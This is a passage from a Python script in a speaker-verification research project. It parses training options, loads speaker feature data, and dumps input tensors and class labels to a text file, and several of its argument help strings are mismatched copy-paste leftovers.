(default: 64)')\nparser.add_argument('--dropout-p', type=float, default=0.0, metavar='BST',\n help='input batch size for testing (default: 64)')\n\n# loss configure\nparser.add_argument('--loss-type', type=str, default='soft',\n help='path to voxceleb1 test dataset')\nparser.add_argument('--num-center', type=int, default=2, help='the num of source classes')\nparser.add_argument('--source-cls', type=int, default=1951,\n help='the num of source classes')\nparser.add_argument('--finetune', action='store_true', default=False,\n help='using Cosine similarity')\nparser.add_argument('--lr-ratio', type=float, default=0.0, metavar='LOSSRATIO',\n help='the ratio softmax loss - triplet loss (default: 2.0')\nparser.add_argument('--loss-ratio', type=float, default=0.1, metavar='LOSSRATIO',\n help='the ratio softmax loss - triplet loss (default: 2.0')\n\n# args for additive margin-softmax\nparser.add_argument('--margin', type=float, default=0.3, metavar='MARGIN',\n help='the margin value for the angualr softmax loss 
function (default: 3.0')\nparser.add_argument('--s', type=float, default=15, metavar='S',\n help='the margin value for the angualr softmax loss function (default: 3.0')\n\n# args for a-softmax\nparser.add_argument('--all-iteraion', type=int, default=0, metavar='M',\n help='the margin value for the angualr softmax loss function (default: 3.0')\nparser.add_argument('--m', type=int, default=3, metavar='M',\n help='the margin value for the angualr softmax loss function (default: 3.0')\nparser.add_argument('--lambda-min', type=int, default=5, metavar='S',\n help='random seed (default: 0)')\nparser.add_argument('--lambda-max', type=float, default=1000, metavar='S',\n help='random seed (default: 0)')\n\nparser.add_argument('--lr', type=float, default=0.1, metavar='LR', help='learning rate (default: 0.125)')\nparser.add_argument('--lr-decay', default=0, type=float, metavar='LRD',\n help='learning rate decay ratio (default: 1e-4')\nparser.add_argument('--weight-decay', default=5e-4, type=float,\n metavar='WEI', help='weight decay (default: 0.0)')\nparser.add_argument('--momentum', default=0.9, type=float,\n metavar='MOM', help='momentum for sgd (default: 0.9)')\nparser.add_argument('--dampening', default=0, type=float,\n metavar='DAM', help='dampening for sgd (default: 0.0)')\nparser.add_argument('--optimizer', default='sgd', type=str,\n metavar='OPT', help='The optimizer to use (default: Adagrad)')\nparser.add_argument('--grad-clip', default=0., type=float,\n help='momentum for sgd (default: 0.9)')\n# Device options\nparser.add_argument('--no-cuda', action='store_true', default=False,\n help='enables CUDA training')\nparser.add_argument('--gpu-id', default='0', type=str,\n help='id(s) for CUDA_VISIBLE_DEVICES')\nparser.add_argument('--seed', type=int, default=123456, metavar='S',\n help='random seed (default: 0)')\nparser.add_argument('--log-interval', type=int, default=10, metavar='LI',\n help='how many batches to wait before logging training status')\n\nparser.add_argument('--acoustic-feature', choices=['fbank', 'spectrogram', 'mfcc'], default='fbank',\n help='choose the acoustic features type.')\nparser.add_argument('--makemfb', action='store_true', default=False,\n help='need to make mfb file')\nparser.add_argument('--makespec', action='store_true', default=False,\n help='need to make spectrograms file')\n\nargs = parser.parse_args()\n\n# Set the device to use by setting CUDA_VISIBLE_DEVICES env variable in\n# order to prevent any memory allocation on unused GPUs\nos.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id\n# os.environ['MASTER_ADDR'] = '127.0.0.1'\n# os.environ['MASTER_PORT'] = '29555'\n\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\n# torch.multiprocessing.set_sharing_strategy('file_system')\n\nif args.cuda:\n torch.cuda.manual_seed_all(args.seed)\n cudnn.benchmark = True\n\n# create logger\n# Define visulaize SummaryWriter instance\nwriter = SummaryWriter(logdir=args.check_path, filename_suffix='_first')\n\nsys.stdout = NewLogger(osp.join(args.check_path, 'log.%s.txt' % time.strftime(\"%Y.%m.%d\", time.localtime())))\n\nkwargs = {'num_workers': args.nj, 'pin_memory': False} if args.cuda else {}\nextract_kwargs = {'num_workers': args.nj, 'pin_memory': False} if args.cuda else {}\n\nif not os.path.exists(args.check_path):\n os.makedirs(args.check_path)\n\nopt_kwargs = {'lr': args.lr, 'lr_decay': args.lr_decay, 'weight_decay': args.weight_decay, 'dampening': args.dampening,\n 'momentum': args.momentum}\n\nl2_dist = 
nn.CosineSimilarity(dim=1, eps=1e-12) if args.cos_sim else nn.PairwiseDistance(p=2)\n\n# pdb.set_trace()\nif args.feat_format == 'kaldi':\n file_loader = read_mat\nelif args.feat_format == 'npy':\n file_loader = np.load\ntorch.multiprocessing.set_sharing_strategy('file_system')\n\n# train_dir = EgsDataset(dir=args.train_dir, feat_dim=args.feat_dim, loader=file_loader, transform=transform,\n# batch_size=args.batch_size, random_chunk=args.random_chunk)\ntransform = ConcateNumInput_Test(num_frames=args.num_frames, remove_vad=args.remove_vad)\n\ntrain_dir = ScriptTrainDataset(dir=args.train_dir, samples_per_speaker=args.input_per_spks,\n loader=file_loader, transform=transform, num_valid=args.num_valid,\n domain=False, rand_test=True)\n\n\n# train_extract_dir = KaldiExtractDataset(dir=args.train_test_dir,\n# transform=transform_V,\n# filer_loader=file_loader,\n# trials_file=args.train_trials)\n#\n# extract_dir = KaldiExtractDataset(dir=args.test_dir, transform=transform_V, filer_loader=file_loader)\n# valid_dir = EgsDataset(dir=args.valid_dir, feat_dim=args.feat_dim, loader=file_loader, transform=transform)\n\n\ndef train(train_loader, output_file):\n # switch to evaluate mode\n pbar = tqdm(enumerate(train_loader))\n\n # start_time = time.time()\n # pdb.set_trace()\n with open(output_file, 'w') as f:\n for batch_idx, (data, label) in pbar:\n for i in range(len(data)):\n if i == 0 and batch_idx % 10 == 0:\n print(str(data[i].squeeze().tolist()), str(label[i].tolist()))\n f.write(\"input: \" + str(data[i].squeeze().tolist()) + \" class: \" + str(label[i].tolist()) + \"\\n\")\n\n\ndef main():\n # Views the training images and displays the distance on anchor-negative and anchor-positive\n # test_display_triplet_distance = False\n # print the experiment configuration\n print('\\nCurrent time is \\33[91m{}\\33[0m.'.format(str(time.asctime())))\n opts = vars(args)\n keys = list(opts.keys())\n keys.sort()\n\n options = []\n for k in keys:\n options.append(\"\\'%s\\': \\'%s\\'\" % (str(k), str(opts[k])))\n\n print('Parsed options: \\n{ %s }' % (', '.join(options)))\n print('Number of Speakers: {}.\\n'.format(train_dir.num_spks))\n\n # dataset objects\n train_loader = torch.utils.data.DataLoader(train_dir, batch_size=args.batch_size, shuffle=args.shuffle, **kwargs)\n # valid_loader = torch.utils.data.DataLoader(valid_dir, batch_size=int(args.batch_size / 2), shuffle=False, **kwargs)\n # train_extract_loader = torch.utils.data.DataLoader(train_extract_dir, batch_size=1, shuffle=False, **extract_kwargs)\n\n start_time = time.time()\n\n train(train_loader, args.output_file)\n\n writer.close()\n stop_time = time.time()\n t = float(stop_time - start_time)\n print(\"Running %.4f minutes.\\n\" % (t / 60))\n exit(0)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"TrainAndTest/deprecated/test_data_rand.py","file_name":"test_data_rand.py","file_ext":"py","file_size_in_byte":16945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}